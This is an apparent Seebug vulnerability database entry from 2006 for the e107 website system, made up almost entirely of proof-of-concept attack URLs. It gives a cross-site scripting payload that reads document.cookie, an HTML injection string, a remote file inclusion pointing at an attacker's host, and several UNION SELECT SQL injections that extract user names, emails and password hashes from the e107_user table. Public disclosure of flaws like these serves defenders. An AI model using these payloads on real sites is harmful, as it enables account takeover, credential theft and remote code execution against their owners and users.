e107 Website System Multiple Security Vulnerabilities Exploit

2006-12-09T00:00:00
ID SSV:5790
Type seebug
Reporter Root
Modified 2006-12-09T00:00:00

Description

No description provided by source.

                                        
                                            
Janek Vind (come2waraxe@yahoo.com) provided the following test methods:

- Cross-site scripting:

http://www.example.com/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); 
//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 

http://www.example.com/e107_0615/usersettings.php?avmsg=[xss code here] 

- HTML injection in the "email article to a friend" and "submit news" pages:

foobar'><body onload=alert(document.cookie);> 

- File inclusion:

http://www.example.com/e107_0615/e107_handlers/secure_img_render.php?p=http://<attacker's host>/<attacker's script>.php 

- SQL injection:

http://www.example.com/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null, 
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null, 
null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* 

http://www.example.com/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, 
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, 
null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* 

http://www.example.com/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null, 
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, 
null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*